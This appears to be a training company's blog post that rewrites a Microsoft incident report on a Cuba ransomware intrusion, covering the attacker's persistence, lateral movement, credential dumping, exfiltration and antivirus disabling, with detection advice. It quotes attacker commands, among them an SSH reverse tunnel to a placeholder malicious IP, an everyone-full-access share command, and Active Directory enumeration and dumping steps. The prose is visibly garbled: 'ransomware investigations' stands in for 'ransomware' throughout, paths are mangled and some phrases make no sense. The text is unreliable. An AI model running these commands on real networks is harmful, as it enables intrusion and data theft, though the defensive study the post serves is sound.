What is Ransomware? Simply explained, ransomware is a form of malware that infects a computer...
Warning to defenders: A Case for Post-Ransomware Investigations
One of the most common threats to which the Microsoft Detection and Response Team (DART) now responds is ransomware investigations. As most network security postures improve, the groups responsible for these attacks continue to become more complex in their tactics, methods, and procedures (TTPs).
This blog post, discuss a recent ransomware investigations instance in which the attacker launched their malicious code utilizing a variety of common tools and methods, such as living-off-the-land binaries. After compromised accounts’ passwords were reset, Cobalt Strike was utilized to continue access to the network with NT AUTHORITY/SYSTEM (local SYSTEM) rights.
This thing shows how an attacker can stay on a network for a very long time before releasing ransomware investigations. They’ll go through the different methods used as well as the suggested defense and detection strategies that customers may take to better defend themselves against these kinds of attacks.
What was found
Figure 1. Overall timeline of activities of the ransomware incident
Ransomware investigations: Initial access
Due to the age of the attack, the short retention of security solutions, the reimage of encrypted devices before analysis, and other factors, DART was unable to identify the initial entry vector of this attack. The actor had domain administrator access when the activity was first discovered.
Ransomware investigations: Persistence
The DART team discovered multiple cases of scheduled activities and services being launched by the attack for persistence after they had acquired access to highly privileged credentials during their post-ransomware investigations analysis of this engagement. The malicious code of Services and Scheduled Tasks can operate with extremely privileged access by choosing to run as NT AUTHORITYSystem.
Service: Cobalt Strike
On servers, domain controllers, and admin workstations, Cobalt Strike was observed to spread throughout the network. To load the Cobalt Strike DLL by calling the “AllocConsole” exported function of a variant of the Termite family of malware, the attacker established Windows services that would execute rundll32 and persist their payload. These services can be seen to run using SYSTEM and domain administrator credentials together. Crimeware organizations usually use termite malware to load Cobalt Strike and avoid antivirus detection.
Figure 2. Example of the actor executing Cobalt Strike through rundll32.exe with system integrity
The Cobalt Strike DLLs had names based on the first and local octets of the command and control method, and they were located at C:\Windows\Temp (C2). A PowerShell script that copied the Cobalt Strike DLL to C:\Windows\Temp over SMB and then executed it through the installation of a remote service was used to spread the malware after the attacker had installed it on a domain controller.
Figure 3. Example of the threat actor copying Cobalt Strike through SMB
Through the development of a service, the actor increased their permissions to “NT AUTHORITYSystem”. This service was probably created using Cobalt Strike and a pseudorandom service name, such as “4aedb00.”
Scheduled task: OpenSSH
To maintain persistence on important servers, such as domain controllers and domain administrator workstations, the actor installed OpenSSH on the client’s network. Instead of using the default OpenSSH path in System32, the actor installed OpenSSH under C:\Windows\OpenSSH.
As “NT AUTHORITY\System,” the attacker set up a scheduled operation to maintain an SSH connection to their C2. Instead of using TCP 22 as is usual for SSH transmission, the attacker used TCP 443. TCP 443 is usually open even if TCP 22 outbound may be prohibited in many enterprises because of its importance for online traffic. To enable the tunneling of malicious tools through the SSH connection, the attacker also enabled port forwarding on TCP 7878.
Additionally, the attacker was seen renaming ssh.exe to “C:\Windows\OpenSSH\svchost.exe” in an obvious attempt to avoid detection.
Figure 4. Example of the process masquerading to hide SSH usage
Four days after the ransomware was released, the attacker used their existing OpenSSH persistence to access the compromised network again and installed further persistent SSH services on additional domain controllers and domain administrator workstations.
To transmit files between their C2 and the compromised host, the attacker used the sftp-server in OpenSSH. On compromised hosts, the actor created SSH keys utilizing ssh-keygen.exe, a component of the OpenSSH toolbox. After the credentials had been reset, the attacker was able to SSH using the keys rather than the credentials.
Lateral movement
Impacket (WMI)
For remote execution and discovery throughout the initial stages of the compromise, Impacket’s WMI modules were utilized. An open-source library of scripts for interacting with network protocols is called Impacket. Many crimeware organizations have recently used this toolbox for network investigation and lateral movement.
The attacker executed PowerShell scripts from “C:\Perflogs\” through Impacket, which created.txt files in the same path. Every command that is executed with Impacket outputs its findings to “\\127.0.0.1\ADMIN$\_1648051380.61”. After the PowerShell scripts and text files had been run, the attacker removed everything.
Figure 5. Sample Impacket query with results being output into a file within the ADMIN$ directory
Before deploying Cobalt Strike on the device, the actor used Impacket to see if the destination server could hit the attacker’s C2.
Figure 6. Actor testing the connectivity to their C2 through Impacket
PsExec
PsExec.exe was used by the actor to disseminate the ransomware throughout the victims’ network. First, the attacker ran “open.bat,” which then ran “net share [C-Z]=[C-Z]:\ /grant:everyone,FULL.” Every drive on the host was shared, giving everyone access. The Cuba ransomware investigations comes in the forms “A.exe,” “Anet.exe,” and “Aus.exe.”
Figure 7. Command lines the actor executed through PsExec
Remote desktop protocol
The main technique the attacker employed in this incident for the lateral movement was Remote Desktop Protocol (RDP), which allowed them to use a GUI environment to change system settings and install malware. The attacker had access to lateral movement and remote code execution using Impacket and PsExec. To RDP between devices, the attacker used domain administrator accounts.
Ransomware investigations: Credential access
WDigest
Early in the compromise, the attacker used WDigest to cache credentials. The attacker was able to access domain administrator credentials as a result.
When turned on, the Windows function WDigest stores login information in clear text in its cache. Tools for gaining access to credentials, like Mimikatz, usually misuse this. The registry entry HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential will be set to 1 to determine whether WDigest has been enabled on your network. By setting the value to 0, this can be disabled.
Figure 8. Example of the actor enabling WDigest
NTDSUtil Dumping
The Active Directory database (NTDS.dit) was twice acquired by the attacker. In the first instance, five months into the compromise, the actor received the NTDS.dit. The attacker was able to access the NTDS.dit a second time four days after the ransomware investigations was deployed. By using the native application ntdsutil.exe and copying the.dit to “C:\Windows\Temp\data\audit\Active Directory\ntds.dit”, the attacker was able to produce a copy of the NTDS.dit.
Figure 9. Actor command to obtain ntds.dit
Volume shadow copy access
The attacker created a volume shadow clone of a domain controller using “vssadmin,” which they then utilized to access the Active Directory database. By using this method, system files that a user normally wouldn’t be able to access are created in a static copy. The attacker copied the NTDS.dit, SYSTEM hive, and SECURITY hive to C:\Windows\ after creating the volume shadow copy so they could later remotely copy through the ADMIN$ share.
Figure 10. Actor commands to create Volume Shadow Copy and copy the ntds.dit
Ransomware investigations: Exfiltration
Compression
Before exfiltration, the attacker was seen compressing files with 7-Zip. The program 7z.exe was launched from C:\Windows\Temp. The attacker used the hostname of the device as the archive’s name without securing it with a password (for example: DC01.7z).
PSCP
To remotely exfiltrate network shares to a C2 under the control of the attacker, the attacker used PuTTY Secure Copy (PSCP). In an attempt to appear as the absolute “lsas.exe” service, this version of PSCP had been renamed to “lsas.exe”. PSCP was run from the C:\Windows\Temp directory. The attacker specifically targeted people and financial resources.
Figure 11. Masqueraded PSCP to exfiltrate files
Defense evasion
Disabling antivirus
After files had been quarantined by the antivirus, the attacker turned off Microsoft Defender Antivirus on some devices. While connected to the device through RDP, the attacker disabled Microsoft Defender Antivirus by using the Windows Security GUI tool.
Figure 12. Microsoft Defender for Endpoint alert from the actor disabling real-time monitoring
Kernel driver
The attacker used a driver for Avast anti-rootkit. In a recent blog post, Unit 42 described how Cuba ransomware investigations organizations have used this driver to disable antivirus software before the distribution of the ransomware.
Using the “sc” command, the actor installed the driver and made kernel-level rights available. The actor then entered “sc start aswSP-ArPot2” to start the service. The actor used this service to gain access to the kernel privileges necessary to disable the victims’ antivirus software. The victim network’s disabling of antivirus software made certain that the ransomware wouldn’t be contained or stopped from spreading.
Figure 13. Vulnerable driver being installed
Also, the attacker created harmless binaries to attack the driver’s weakness. Each executable name from a list of popular antivirus programs would be passed to the control code 0x9988C094 by these binaries, which would then ask the controller to end the processes.
Discovery
It was noticed that the attacker was using standard system enumeration commands. Even though these instructions are benign, when they are combined, they can usually be used to detect an unauthorized user who is enumerating the system.
The following commands were seen being followed by the attacker:
- whoami
- ping 8.8.8.8
- TASKLIST /v
- sc queryex type=service state=all
- wevtutil el
- SYSTEMINFO
- dsquery user -limit 100000
- powershell -command “Get-ADUser -Filter * -Properties * | Out-File C:\Windows\Temp\data\domain_user.txt -Append”
- powershell -command “Get-ADComputer -Filter * -Properties * | Out-File C:\Windows\Temp\data\domain_pc.txt -Append”
- wmic useraccount list full
Strategies for protection and detection that are advised for Ransomware investigations
Organizations must make sure they follow security procedures to protect their servers as we see more attacks using techniques similar to those in this blog. The suggestions for monitoring that businesses should use as part of their detection strategy are listed below.
Service creation
Monitoring for unusual events should be done during service creation events. On administrator accounts that create services that run as System, a strong alert should be issued. It is possible to use this common privilege escalation approach in a number of ways, including via using the service.
- directly run a malicious binary,
- Write to a Named Pipe that is in the control of an actor so that the actor can steal an impersonation token.
- Using rundll32.exe to run a DLL
Figure 14. The instance of rundll32.exe execute Cobalt Strike with System integrity level
It is important to keep an eye out for unusual executables or paths while creating new services. Drivers who are near those unusual paths should receive high-priority alerts. Even though the driver was duly signed, the position might indicate malicious use. Anomalous paths can take many forms, including but not limited to:
- C:\Temp\
- C:\ProgramData\
- C:\Windows\
- C:\Windows\Temp\
Use of SSH
Microsoft recommends keeping an eye out for SSH installs and usage in your network that isn’t authorized. Running SSH as “NT AUTHORITY\System” is not recommended.
The actor used the following SSH command lines in this event. Observing similar activity in your environment is recommended:
ssh <organization>@<malicious IP address> -p 443 -i C:\ProgramData\ssh\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no
Monitoring for the command on other process names may reveal process masquerading because the actor attempted to hide the SSH process as “svchost.exe”.
Ransomware investigations : Copying to a remote share
Microsoft recommends keeping an eye out for remote share access from the command prompt. The attacker usually applied this method to transfer files around the network.
Figure 15. The actor copied Cobalt Strike via SMB
When the command prompt makes a remote sharing request, Microsoft Defender for Endpoint will issue an alert. This also applies to Impacket statements that target the localhost ADMIN$ share. Your network’s monitoring of these warnings can help you identify unauthorized access.
Figure 16. Sample alert in Defender for Endpoint when a command prompt accesses a remote share
Ransomware investigations : PsExec
Networks need to focus on PsExec usage. Detection methods that are suggested include:
- Existence or execution of the binary: PsExec.exe
- Existence or execution of the service binary: PsExeSvc.exe
- Service creation named PsExeSvc
- Named Pipes created with the name PsExeSvc
Monitoring for each stage of PsExec can assist detect unauthorized versions within your network because the techniques used by PsExec are simple to replicate, either using off-the-shelf tools or through a custom, toolset using the Windows API. PsExec works in 3 stages:
- Copying the binary “PSEXESVC” to the Windows directory using an SMB connection to the destination device’s ADMIN$.
- Creating a service to run the binary directly through the destination device’s RPC (port 135).
- To send and get remote communications between the host and destination, create the called \\.\pipe.pipePSEXESVC.
Figure 17. Diagram describing how PsExec works
Monitoring of executable files written to administrative shares can aid in finding lateral movement attempts. This can involve keeping an eye out for native command lines, such as copy, that target remote shares like the ones we mentioned earlier. DeviceFileEvents in Defender for Endpoint can be used to track file creation events sent through Server Message Block (SMB). The kernel process that controls SMB, ntoskrnl.exe, will produce the executable file, and the ShareName column will be set to ADMIN$.
Figure 18. Example of PsExeSvc.exe being created via Server Message Block (SMB) in Defender for Endpoint
Network administrators should pay attention to any unexpected remote connections to port 135 (RPC), which can be used by a process to remotely start and create services. Defender for Endpoint’s Advanced Hunting can help identify unusual connections on Port 135 by using the summary and sort operators. The KQL listed below can be used as a foundation for finding anomalous connections:
DeviceNetworkEvents | where RemotePort == 135 | summarize count() by InitiatingProcessFileName | sort by count_ asc
Figure 19. Image showing PsExec.exe connecting to a remote host on port 135
By using named pipes to create remote services, this method can also be duplicated. A remote actor can open the named pipe svcctl and connect to the IPC$ share to remotely launch a service. Similar detections would be present here, but the communication will go via port 445 to the IPC$ share.
The RPC connection will cause a service to be created at the destination end. Monitoring for unauthorized service creation by recording the 4679 events in the System event log.
Figure 20. Service creation event in Defender for Endpoint
By creating the named pipe on the target server, remote named pipe traffic can be monitored. The host device can connect to the specified pipe PSEXESVC created by PsExeSvc.exe via the IPC$ share. The ntoskrnl.exe process will connect to the specified pipe as a client because the host device connection is made through SMB.
Figure 21. Remote SMB named pipe communications for PsExec
NTDS.dit dumping
Monitoring for any malicious uses of ntdsutil where actors can try to take the NTDS.dit. The command in the NTDS.dit dumping section illustrates how the actor duplicated the NTDS.dit using this tool. The only variable that will change throughout the execution of this command is the path, which may be observed. There aren’t many good reasons to make a complete NTDS.dit duplicate.
Figure 22. Defender for Endpoint alert from ntds.dit dump
The defender for Endpoint sends alarms when the NTDS.dit is dumped, and these alerts need to be resolved immediately. Also strongly advised is the monitoring of “ntdsutil” usage that is not authorized.
Alerting on the creation of new.dit files can also assist in identifying potential NTDS.dit dumping if file monitoring is enabled on your network. A volume shadow copy of the NTDS.dit was seen being copied by the attacker.
Figure 23. Example command copying NTDS.dit from a volume shadow copy
Antivirus tampering
In cases where antivirus has been turned off or tampered with, organizations should pay attention to and respond to antivirus and endpoint detection and response (EDR) alerts. Anti-tampering settings should be enabled whenever possible to stop actors from tampering with and turning off antivirus software.
Event logging is offered by Microsoft Defender Antivirus on product tampering attempts. This may entail turning off services like Real-Time Protection (Event ID: 5001). Additionally, an alert will be sent on the Defender for Endpoint portal, where users can further prioritize it using the advanced hunting interface. Additionally, monitoring for the use of the Windows PowerShell cmdlet might help in the detection of anti-virus tampering.
Figure 24. Sample command to look for antivirus tampering
Remote desktop protocol
Through anomalous connections, DART was able to identify actor RDP connections. These unusual connections include the following:
- the first time they log into different servers, domain administrators, and
- RDP connections started by domain administrators in strange places
Investigations of domain and enterprise administrator logons should look for unusual connections, such as those coming from edge servers or onto servers they don’t usually manage. Administrator accounts should be subject to multifactor authentication (MFA).
Conclusion
Through longer periods of hibernation before encryption, different kinds of persistent access, and the use of real certified binaries, ransomware investigations groups continue to become more effective. Some of these groups return to the network after encryption to make sure they keep a foothold on the network. These groups continue to target sensitive data for exfiltration.
Networks must continue to be on the lookout for these TTPs and unusual activity. The Cuba ransomware investigations organization used a wide range of survival methods to avoid being identified by antivirus software. This requires shifting the focus away from traditional malicious file detection and toward anomaly and behavioral detections for network hunting. Remote execution and access tools like PsExec and SSH should have their software audited regularly.
Microsoft recommends you concentrate on taking the following steps to improve the security of your network:
- Tamper protection is enabled in antivirus software.
- A fast triage of high-severity antivirus and EDR warnings, including tampering alerts, is required.
- MFA and monitoring for admin accounts should be enabled.
- Tracking errors in service creation and scheduled task creation.
Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.
For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com